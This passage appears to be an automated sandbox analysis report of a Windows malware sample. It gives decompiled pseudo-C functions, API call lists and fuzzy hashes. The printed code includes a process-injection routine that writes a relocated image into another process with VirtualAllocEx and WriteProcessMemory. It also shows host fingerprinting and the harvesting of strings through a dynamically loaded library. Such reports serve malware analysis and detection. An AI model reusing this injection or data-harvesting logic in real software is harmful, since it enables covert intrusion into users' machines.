    				signed int _v28;
    				int _v32;
    				char _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _v48;
    				signed int _v52;
    				intOrPtr _v56;
    				signed int _v60;
    				signed int _v64;
    				intOrPtr _v74;
    				intOrPtr _v78;
    				char _v80;
    				struct _SYSTEMTIME _v96;
    				char _v112;
    				short _v184;
    				short _v288;
    				void* __ebx;
    				void* __esi;
    				signed int _t127;
    				signed int _t131;
    				signed int _t132;
    				signed int _t133;
    				signed int _t134;
    				signed int _t140;
    				signed int _t142;
    				signed int _t143;
    				signed int _t151;
    				signed int _t155;
    				signed int _t159;
    				signed char _t163;
    				signed int _t167;
    				signed int _t176;
    				signed int _t177;
    				signed int _t186;
    				long _t191;
    				long _t195;
    				signed int _t201;
    				void* _t202;
    				signed int _t203;
    				signed int _t208;
    				signed int _t211;
    				signed int _t212;
    				signed int _t219;
    				short* _t230;
    				signed int _t238;
    				intOrPtr _t239;
    				void* _t244;
    
    				_t239 = _a4;
    				_t126 =  *((intOrPtr*)(_t239 + 0x40));
    				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
    					_t127 = E0040C9F1( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
    					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
    					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
    					_t238 = _t127;
    					_v64 = _t238;
    					__eflags = _t238;
    					if(_t238 == 0) {
    						L55:
    						E00406E85(_v64);
    						__eflags = 0 -  *(_t239 + 0x3c);
    						asm("sbb eax, eax");
    						return  ~0x00000000;
    					}
    					_t131 = _v12;
    					__eflags = _t131 - 0x10;
    					if(_t131 <= 0x10) {
    						goto L55;
    					}
    					__eflags =  *((char*)(_t239 + 0x18)) - 1;
    					_v16 = 1;
    					_t132 = _t131 + _t238;
    					__eflags = _t132;
    					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
    					_v12 = _t132;
    					while(1) {
    						_t133 =  *(_t238 + 2) & 0x0000ffff;
    						__eflags = _t133 - 0x10;
    						if(_t133 < 0x10) {
    							goto L55;
    						}
    						_t219 =  *(_t238 + 4) & 0x0000ffff;
    						__eflags = _t219 - _t133;
    						if(_t219 >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 6) - _t133;
    						if( *(_t238 + 6) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 8) - _t133;
    						if( *(_t238 + 8) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 0xa) - _t133;
    						if( *(_t238 + 0xa) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 0xc) - _t133;
    						if( *(_t238 + 0xc) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 0xe) - _t133;
    						if( *(_t238 + 0xe) >= _t133) {
    							goto L55;
    						}
    						_t134 =  *_t238 & 0x0000ffff;
    						_t208 = _t134 >> 0x00000009 & 0x00000008;
    						_t220 = _t238 + _t219;
    						__eflags = (_t134 & _v28) - _v28;
    						if((_t134 & _v28) != _v28) {
    							L48:
    							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
    							_t102 = _t238 + 0x10; // 0x10
    							__eflags = _t102 - _v12;
    							if(_t102 > _v12) {
    								goto L55;
    							}
    							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
    							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
    								goto L55;
    							}
    							_v16 = _v16 + 1;
    							continue;
    						}
    						_t234 = _t208;
    						_t140 = E0041A956(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
    						__eflags = _t140;
    						if(_t140 == 0) {
    							goto L48;
    						}
    						_t141 =  *(_t239 + 0x44);
    						__eflags =  *(_t239 + 0x44);
    						if(__eflags == 0) {
    							L16:
    							_t142 =  *(_t238 + 8) & 0x0000ffff;
    							__eflags = _t142;
    							if(_t142 == 0) {
    								L18:
    								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
    								__eflags = _t143;
    								if(_t143 == 0) {
    									L20:
    									__eflags =  *_t238 & 0x00000010;
    									if(( *_t238 & 0x00000010) == 0) {
    										L31:
    										E00406F38( &_v60,  &_v60, 0, 0x1c);
    										_v60 =  *_t238 & 0x0000ffff;
    										_t209 = _t208 | 0xffffffff;
    										_v56 = E004072E3(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
    										_t151 =  *(_t238 + 6) & 0x0000ffff;
    										__eflags = _t151;
    										if(_t151 != 0) {
    											__eflags = _t151 + _t238;
    											_v52 = E004072E3(_t209, _t151 + _t238);
    										} else {
    											_v52 = _v52 & 0x00000000;
    										}
    										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
    										__eflags = _t155;
    										if(_t155 != 0) {
    											__eflags = _t155 + _t238;
    											_v48 = E004072E3(_t209, _t155 + _t238);
    										} else {
    											_v48 = _v48 & 0x00000000;
    										}
    										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
    										__eflags = _t159;
    										if(_t159 != 0) {
    											__eflags = _t159 + _t238;
    											_v44 = E004072E3(_t209, _t159 + _t238);
    										} else {
    											_v44 = _v44 & 0x00000000;
    										}
    										_t163 =  *_t238 & 0x0000ffff;
    										__eflags = _t163 & 0x00000003;
    										if((_t163 & 0x00000003) != 0) {
    											E0041BBB9( *(_t239 + 0x3c),  *(_t239 + 0x38));
    											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
    											_t167 = E00406ED8(__eflags,  &_v60, 0x1c);
    											 *(_t239 + 0x38) = _t167;
    											__eflags = _t167;
    											if(_t167 == 0) {
    												E0041BB90( &_v60);
    												_t239 = _a4;
    											} else {
    												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
    											}
    											goto L55;
    										} else {
    											__eflags = _t163 & 0x0000000c;
    											if(__eflags == 0) {
    												E0041BB90( &_v60);
    												L47:
    												_t239 = _a4;
    												goto L48;
    											}
    											_t211 = E0040C9F1( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
    											_v40 = _t211;
    											__eflags = _t211;
    											if(_t211 == 0) {
    												L54:
    												E00406E85(_t211);
    												E0041BB90( &_v60);
    												_t239 = _a4;
    												E0041BBB9( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
    												_t122 = _t239 + 0x3c;
    												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
    												__eflags =  *_t122;
    												goto L55;
    											}
    											_t176 = E0040D0C3(_t211, _v36);
    											__eflags = _t176;
    											if(_t176 == 0) {
    												goto L54;
    											}
    											_t177 = E00406E10(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
    											__eflags = _t177;
    											if(_t177 == 0) {
    												goto L54;
    											}
    											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
    											E00406EC1( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
    											goto L47;
    										}
    									}
    									__eflags =  *(_t238 + 0xc);
    									if( *(_t238 + 0xc) <= 0) {
    										goto L31;
    									}
    									E00413277( &_v184, _t220, 1,  &_v288);
    									_t186 = E0040812A( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E004079C2(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
    									__eflags = _t186;
    									if(_t186 == 0) {
    										goto L48;
    									}
    									_t230 =  &_v184;
    									_t212 = 0;
    									__eflags = 0;
    									do {
    										E004071ED( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
    										_t212 = _t212 + 1;
    										_t230 = _t230 + 4;
    										__eflags = _t212 - 0x10;
    									} while (_t212 < 0x10);
    									_v32 = _v32 | 0xffffffff;
    									_t208 = 0x10;
    									 *_t230 = 0;
    									_v24 = _t208;
    									_v20 = 0x80000001;
    									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
    									__eflags = _t191;
    									if(_t191 != 0) {
    										goto L31;
    									}
    									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
    									__eflags = _t195;
    									if(_t195 == 0) {
    										_v32 = _v24;
    									}
    									RegCloseKey(_v20);
    									__eflags = _v32 - _t208;
    									if(_v32 == _t208) {
    										GetLocalTime( &_v96);
    										__eflags = _v74 - _v96.wDay;
    										if(_v74 != _v96.wDay) {
    											goto L31;
    										}
    										__eflags = _v78 - _v96.wMonth;
    										if(_v78 == _v96.wMonth) {
    											goto L48;
    										}
    									}
    									goto L31;
    								}
    								_t220 = _t238 + _t143;
    								_t201 = E0041A98B(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
    								__eflags = _t201;
    								if(_t201 == 0) {
    									goto L48;
    								}
    								goto L20;
    							}
    							_t220 = _t238 + _t142;
    							_t202 = E0041A98B(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
    							__eflags = _t202 - 1;
    							if(_t202 == 1) {
    								goto L48;
    							}
    							goto L18;
    						}
    						_t203 = E0041AC11(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
    						__eflags = _t203;
    						if(_t203 != 0) {
    							goto L48;
    						}
    						goto L16;
    					}
    					goto L55;
    				}
    				return 0;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2f3246c066e05bc2b23bf782482203786d12af334d1a921b727413feaa814aa7
    • Instruction ID: ec3c5f02203622307eca31a71dac6fea4476a15ee75475fce76217667263b702
    • Opcode Fuzzy Hash: 2f3246c066e05bc2b23bf782482203786d12af334d1a921b727413feaa814aa7
    • Instruction Fuzzy Hash: FAB1C1B1900605AADB24DFA5C881BFEB7B4FF04304F40442AF956A7691D738E9D2CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040B7DE(void* __eax, void* _a4) {
    				char _v5;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				long _v24;
    				void* _t37;
    				void* _t42;
    				intOrPtr* _t43;
    				int _t44;
    				long _t46;
    				void* _t47;
    				SIZE_T* _t48;
    				signed int _t50;
    				void* _t52;
    				void* _t54;
    				void* _t55;
    				void* _t60;
    				intOrPtr _t61;
    				intOrPtr _t62;
    				unsigned int _t64;
    
    				_t55 = __eax;
    				_t60 =  *((intOrPtr*)(__eax + 0x3c)) + __eax;
    				_t46 =  *(_t60 + 0x50);
    				_v24 = _t46;
    				_v5 = 0;
    				if(IsBadReadPtr(__eax, _t46) == 0) {
    					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
    					_v12 = _t37;
    					__eflags = _t37;
    					if(__eflags == 0) {
    						L17:
    						return _v12;
    					}
    					_t47 = E00406ED8(__eflags, _t55, _t46);
    					_t48 = 0;
    					__eflags = _t47;
    					if(_t47 == 0) {
    						L16:
    						VirtualFreeEx(_a4, _v12, 0, 0x8000);
    						_t32 =  &_v12;
    						 *_t32 = _v12 & 0x00000000;
    						__eflags =  *_t32;
    						goto L17;
    					}
    					__eflags =  *(_t60 + 0xa4);
    					if( *(_t60 + 0xa4) <= 0) {
    						L15:
    						E00406E85(_t47);
    						__eflags = _v5;
    						if(_v5 != 0) {
    							goto L17;
    						}
    						goto L16;
    					}
    					_t42 =  *(_t60 + 0xa0);
    					__eflags = _t42;
    					if(_t42 <= 0) {
    						goto L15;
    					}
    					_t61 =  *((intOrPtr*)(_t60 + 0x34));
    					_t54 = _v12 - _t61;
    					_v20 = _t55 - _t61;
    					_t43 = _t42 + _t47;
    					while(1) {
    						__eflags =  *_t43 - _t48;
    						if( *_t43 == _t48) {
    							break;
    						}
    						_t62 =  *((intOrPtr*)(_t43 + 4));
    						__eflags = _t62 - 8;
    						if(_t62 < 8) {
    							L12:
    							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
    							_t48 = 0;
    							__eflags = 0;
    							continue;
    						}
    						_t64 = _t62 + 0xfffffff8 >> 1;
    						__eflags = _t64;
    						_v16 = _t48;
    						if(_t64 == 0) {
    							goto L12;
    						} else {
    							goto L9;
    						}
    						do {
    							L9:
    							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
    							__eflags = _t50;
    							if(_t50 != 0) {
    								_t52 = (_t50 & 0x00000fff) +  *_t43;
    								_t19 = _t52 + _t47;
    								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
    								__eflags =  *_t19;
    							}
    							_v16 = _v16 + 1;
    							__eflags = _v16 - _t64;
    						} while (_v16 < _t64);
    						goto L12;
    					}
    					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
    					__eflags = _t44;
    					_t28 =  &_v5;
    					 *_t28 = _t44 != 0;
    					__eflags =  *_t28;
    					goto L15;
    				}
    				return 0;
    			}

    APIs
    • IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 0040B7FA
    • VirtualAllocEx.KERNEL32(74B5F560,00000000,?,00003000,00000040,?,74B5F560,00000000), ref: 0040B818
    • WriteProcessMemory.KERNEL32(74B5F560,74B5F560,00000000,?,00000000,?,?,?,74B5F560,00000000), ref: 0040B8AA
    • VirtualFreeEx.KERNEL32(74B5F560,74B5F560,00000000,00008000,?,?,?,74B5F560,00000000), ref: 0040B8CF
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Virtual$AllocFreeMemoryProcessReadWrite
    • String ID:
    • API String ID: 1273498236-0
    • Opcode ID: ad309d584c6095ef31be8bc32e7e68e74d63357ed73befb9e20fff431accc7bd
    • Instruction ID: 05f4cc67dc527be10a939cc3f82fdcead84bab68d076cc06bb59cde88bd9e295
    • Opcode Fuzzy Hash: ad309d584c6095ef31be8bc32e7e68e74d63357ed73befb9e20fff431accc7bd
    • Instruction Fuzzy Hash: C8318E72A00209AFDF10AF64CD84BAEBBB8EF05745F05807AE546B62E1D7749950CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004084FA(intOrPtr _a4) {
    				intOrPtr _v20;
    				void* _v32;
    				signed int _t6;
    				signed int _t7;
    				int _t9;
    				int _t14;
    				void* _t15;
    
    				_t14 = 0;
    				_t6 = CreateToolhelp32Snapshot(4, 0);
    				_t15 = _t6;
    				_t7 = _t6 | 0xffffffff;
    				if(_t15 != _t7) {
    					_v32 = 0x1c;
    					_t9 = Thread32First(_t15,  &_v32);
    					while(_t9 != 0) {
    						if(_v20 == _a4) {
    							_t14 = _t14 + 1;
    						}
    						_t9 = Thread32Next(_t15,  &_v32);
    					}
    					CloseHandle(_t15);
    					return _t14;
    				}
    				return _t7;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00408507
    • Thread32First.KERNEL32 ref: 00408522
    • Thread32Next.KERNEL32 ref: 00408538
    • CloseHandle.KERNEL32(00000000), ref: 00408543
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
    • String ID:
    • API String ID: 3643885135-0
    • Opcode ID: 5eea521bdcce35c7ef14d23768b8b11b573b97721610fa4f182ba6dfdad7cfe4
    • Instruction ID: d1718b7751feb3b247e78551eebf8bcd15b2246508de57807b17a10f99d387ed
    • Opcode Fuzzy Hash: 5eea521bdcce35c7ef14d23768b8b11b573b97721610fa4f182ba6dfdad7cfe4
    • Instruction Fuzzy Hash: A1F05472501015ABDB206B699D48DEF7BBCEB85361B400136F952F22D0DB34990186BA
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(00000000,00000001,00000006), ref: 00409FD0
    • bind.WS2_32(00000000,?,-0000001D), ref: 00409FF0
    • listen.WS2_32(00000000,?), ref: 00409FFF
    • closesocket.WS2_32(00000000), ref: 0040A00A
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: bindclosesocketlistensocket
    • String ID:
    • API String ID: 952684215-0
    • Opcode ID: dc46fd4b01959eb24f4a98efc8879a5c904661ccf0e9ab7b58004d9dad9a49e0
    • Instruction ID: 1005e4324c6347c61634e2e4eec7e7d97f479de203e30ca14428de42eac12135
    • Opcode Fuzzy Hash: dc46fd4b01959eb24f4a98efc8879a5c904661ccf0e9ab7b58004d9dad9a49e0
    • Instruction Fuzzy Hash: 6EF0303220021176E7301F39DD4DA6F29A99BC57F1B140729F962EA1F1E73884929566
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E004178F9(void* __ecx, void* __eflags) {
    				void* _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				intOrPtr _v24;
    				void* _v28;
    				char _v32;
    				void* _v36;
    				void* _v40;
    				char _v44;
    				void* _v48;
    				struct HINSTANCE__* _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				char _v132;
    				char _v652;
    				void* __edi;
    				void* __esi;
    				void* _t76;
    				struct HINSTANCE__* _t80;
    				void* _t82;
    				_Unknown_base(*)()* _t85;
    				intOrPtr* _t88;
    				intOrPtr* _t90;
    				intOrPtr* _t92;
    				intOrPtr* _t96;
    				intOrPtr* _t98;
    				intOrPtr* _t100;
    				intOrPtr* _t102;
    				intOrPtr* _t104;
    				intOrPtr* _t106;
    				intOrPtr* _t108;
    				intOrPtr* _t110;
    				intOrPtr* _t112;
    				intOrPtr* _t115;
    				signed int _t120;
    				char _t131;
    				void* _t132;
    				void* _t133;
    				intOrPtr* _t146;
    				void* _t151;
    				void* _t160;
    				WCHAR* _t161;
    				CHAR* _t162;
    				void* _t168;
    
    				_t133 = __ecx;
    				_t76 = 0x36;
    				E00405B00(_t76,  &_v132);
    				_t131 = 0;
    				_t161 =  &_v652;
    				_t80 = E0040AFA9(0x80000002, _t133, _t161,  &_v132, 0, 0x104);
    				if(_t80 == 0xffffffff || _t80 == 0) {
    					L34:
    					return _t80;
    				} else {
    					_t80 = LoadLibraryW(_t161);
    					_v52 = _t80;
    					if(_t80 == 0) {
    						goto L34;
    					}
    					_t162 =  &_v64;
    					_t82 = 0x37;
    					E00405ACA(_t82, _t162);
    					_t85 = GetProcAddress(_v52, _t162);
    					if(_t85 == 0) {
    						L33:
    						return FreeLibrary(_v52);
    					}
    					_push(0);
    					_push(0);
    					_push( &_v8);
    					_push( &_v36);
    					if( *_t85() != 0) {
    						goto L33;
    					}
    					_t88 = _v36;
    					_push( &_v44);
    					_t157 =  &_v56;
    					_push( &_v56);
    					_push(_t88);
    					_v12 = 0;
    					if( *((intOrPtr*)( *_t88 + 0x64))() != 0) {
    						L32:
    						_t90 = _v36;
    						 *((intOrPtr*)( *_t90 + 8))(_t90);
    						_t92 = _v8;
    						 *((intOrPtr*)( *_t92 + 8))(_t92);
    						_push(0xcc);
    						E00416CBC(_t157, _v12, 0x35);
    						goto L33;
    					}
    					_t96 = _v36;
    					_push( &_v48);
    					_t157 =  &_v68;
    					_push( &_v68);
    					_push(0x10);
    					_push(0);
    					_push(_v44);
    					_push(_v56);
    					_push(_t96);
    					if( *((intOrPtr*)( *_t96 + 0x38))() != 0) {
    						L31:
    						_t98 = _v8;
    						 *((intOrPtr*)( *_t98 + 0x18))(_t98, _v44);
    						goto L32;
    					}
    					if(_v68 != 4) {
    						L30:
    						_t100 = _v48;
    						 *((intOrPtr*)( *_t100 + 8))(_t100);
    						goto L31;
    					}
    					_t102 = _v48;
    					_t157 =  &_v28;
    					_push( &_v28);
    					_push(0x200000);
    					_push(_t102);
    					if( *((intOrPtr*)( *_t102 + 0x38))() != 0) {
    						goto L30;
    					}
    					_t104 = _v28;
    					_t157 =  &_v60;
    					_push( &_v60);
    					_push(0);
    					_push(_t104);
    					if( *((intOrPtr*)( *_t104 + 0x24))() != 0) {
    						L29:
    						_t106 = _v28;
    						 *((intOrPtr*)( *_t106 + 8))(_t106);
    						goto L30;
    					}
    					_t108 = _v28;
    					_t157 =  &_v40;
    					_push( &_v40);
    					_push(0);
    					_push(_v60);
    					_push(_t108);
    					if( *((intOrPtr*)( *_t108 + 0x4c))() != 0) {
    						goto L29;
    					}
    					_t110 = _v40;
    					_v20 = 0;
    					if( *_t110 <= 0) {
    						L28:
    						_t146 = _v8;
    						_t157 =  *_t146;
    						 *((intOrPtr*)( *_t146 + 0x18))(_t146, _t110);
    						goto L29;
    					}
    					_v32 = 0;
    					do {
    						_t168 = _v32 + _t110 + 4;
    						_v16 = _t131;
    						if( *((intOrPtr*)(_t168 + 4)) <= _t131) {
    							goto L27;
    						}
    						_v24 = _t131;
    						do {
    							_t115 =  *((intOrPtr*)(_t168 + 8)) + _v24;
    							_t132 = 0;
    							_t151 =  *_t115 - 0x3003001e;
    							if(_t151 == 0) {
    								_t164 =  *((intOrPtr*)(_t115 + 8));
    								if(E00407B4A( *((intOrPtr*)(_t115 + 8)), 0x40) == 0) {
    									goto L25;
    								}
    								_t120 = E004070C5(_t117 | 0xffffffff, 0, _t164);
    								_t166 = _t120;
    								if(_t120 != 0) {
    									_t132 = E00407279(_t120 | 0xffffffff,  &_v12, _t166);
    								}
    								E00406E85(_t166);
    								L23:
    								if(_t132 != 0) {
    									E00407279(1,  &_v12, 0x404b40);
    								}
    								goto L25;
    							}
    							if(_t151 != 1) {
    								goto L25;
    							}
    							_t165 =  *((intOrPtr*)(_t115 + 8));
    							_t160 = 0x40;
    							if(E00407B5E( *((intOrPtr*)(_t115 + 8)), _t160) == 0) {
    								goto L25;
    							}
    							_t132 = E00407279(_t128 | 0xffffffff,  &_v12, _t165);
    							goto L23;
    							L25:
    							_v16 = _v16 + 1;
    							_v24 = _v24 + 0x10;
    						} while (_v16 <  *((intOrPtr*)(_t168 + 4)));
    						_t131 = 0;
    						L27:
    						_t112 = _v8;
    						 *((intOrPtr*)( *_t112 + 0x18))(_t112,  *((intOrPtr*)(_t168 + 8)));
    						_v20 = _v20 + 1;
    						_t110 = _v40;
    						_v32 = _v32 + 0xc;
    					} while (_v20 <  *_t110);
    					goto L28;
    				}
    			}

    APIs
      • Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE
    • LoadLibraryW.KERNEL32(?,?,00000000,00000104,?,00000000,00000001), ref: 0041793F
    • GetProcAddress.KERNEL32(?,?), ref: 00417961
    • FreeLibrary.KERNEL32(?,?,00000000,00000001), ref: 00417B3D
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Library$AddressFreeLoadOpenProc
    • String ID:
    • API String ID: 1197625071-0
    • Opcode ID: 77c11e080dd0586d904d330de35fa6e6fe8ad3c35d283f8a4d1f7a8cfd213e74
    • Instruction ID: 03e3d83d1675e57416ba932070766e100810faa6ab93917bbe63cdc74e755ccf
    • Opcode Fuzzy Hash: 77c11e080dd0586d904d330de35fa6e6fe8ad3c35d283f8a4d1f7a8cfd213e74
    • Instruction Fuzzy Hash: FB716F75A00209AFCB10DFA4C894EEEB7B9FF88354B144559F506E7291D734EE81CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E00413002(void* __ebx, void* __ecx, void* __edi) {
    				void* __esi;
    				void* _t39;
    				signed int _t53;
    				signed int _t54;
    				long _t63;
    				void* _t71;
    				void* _t74;
    				void* _t75;
    				void* _t76;
    				int _t86;
    				void* _t87;
    				void* _t91;
    				void* _t93;
    
    				_t76 = __edi;
    				_t74 = __ecx;
    				_t71 = __ebx;
    				_t91 = _t93 - 0x74;
    				 *(_t91 + 0x68) = 0x28;
    				if(GetComputerNameW(_t91 - 0x14, _t91 + 0x68) == 0) {
    					E00405B00(0xdc, _t91 - 0x14);
    				}
    				_push(_t71);
    				_push(_t76);
    				E00406F38(_t91 - 0x18c, _t91 - 0x18c, 0, 0x11c);
    				 *(_t91 - 0x18c) = 0x11c;
    				if(GetVersionExW(_t91 - 0x18c) != 0) {
    					_push(0x100);
    					_t39 = _t91 - 0x178;
    				} else {
    					_push(0x11c);
    					_t39 = _t91 - 0x18c;
    				}
    				_push(0);
    				_push(_t39);
    				E00406F38(_t39);
    				E00405B00(0xd7, _t91 - 0x70);
    				E00405B00(0xd8, _t91 + 0x44);
    				 *((intOrPtr*)(_t91 + 0x60)) = E0040B05F(0x80000002, _t74, _t91 - 0x70, _t91 + 0x44);
    				E00405B00(0xd9, _t91 + 0x3c);
    				_t86 = 0;
    				 *(_t91 + 0x6c) = 0x80000002;
    				 *((intOrPtr*)(_t91 + 0x70)) = 0;
    				_t53 = RegOpenKeyExW(0x80000002, _t91 - 0x70, 0, 1, _t91 + 0x6c);
    				if(_t53 != 0) {
    					_t54 = _t53 | 0xffffffff;
    				} else {
    					_t54 = E0040B158(_t91 + 0x6c, _t91 + 0x3c, 0, _t91 + 0x70);
    				}
    				if(_t54 != 0xffffffff && _t54 > _t86) {
    					_t86 = E00408234( *((intOrPtr*)(_t91 + 0x70)), _t54);
    					E00406E85( *((intOrPtr*)(_t91 + 0x70)));
    				}
    				 *((intOrPtr*)(_t91 + 0x64)) = _t86;
    				_t87 = _t91 + 0x44;
    				E00405B00(0xda, _t87);
    				_push(E00408234(_t91 + 0x60, 8));
    				_push(E00408234(_t91 - 0x18c, 0x11c));
    				_push(_t91 - 0x14);
    				_t88 =  *((intOrPtr*)(_t91 + 0x7c));
    				_push(_t87);
    				_t75 = 0x3c;
    				_t63 = E00407B78(_t87, _t75,  *((intOrPtr*)(_t91 + 0x7c)));
    				 *(_t91 + 0x68) = _t63;
    				if(_t63 < 1) {
    					_t63 = E00405B00(0xdb, _t88);
    				}
    				return _t63;
    			}

    APIs
    • GetComputerNameW.KERNEL32 ref: 0041301D
    • GetVersionExW.KERNEL32(?,?,00000000,0000011C), ref: 00413058
    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,?,?,?,00000000,00000100), ref: 004130CE
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: ComputerNameOpenVersion
    • String ID:
    • API String ID: 2183321064-0
    • Opcode ID: c02438b6cc5bed3d8db0368e67aaa2aa3bb83cb7fca6d6872683b38d5419d8f2
    • Instruction ID: 9b68806a1d29c15bf198299543978280476cdeb2a0c83b4354aea2eabd1a6aff
    • Opcode Fuzzy Hash: c02438b6cc5bed3d8db0368e67aaa2aa3bb83cb7fca6d6872683b38d5419d8f2
    • Instruction Fuzzy Hash: 194160B2900218ABDB10EFA5CC45ADF77ACEF04304F50412BB915F3291DA38EA45CBA5
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(00000000,00000002,00000011), ref: 0040A2AE
    • bind.WS2_32(00000000,00000017,-0000001D), ref: 0040A2CE
    • closesocket.WS2_32(00000000), ref: 0040A2D9
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: bindclosesocketsocket
    • String ID:
    • API String ID: 1873677229-0
    • Opcode ID: d7a35d400b93c52c0c26cf794c25d440246a81afdfdfcb43f63781092cf35779
    • Instruction ID: 7bc56377d4191a31409f920f53f4623e5ac1a4f2713ff4118f8de3bbdcff3f27
    • Opcode Fuzzy Hash: d7a35d400b93c52c0c26cf794c25d440246a81afdfdfcb43f63781092cf35779
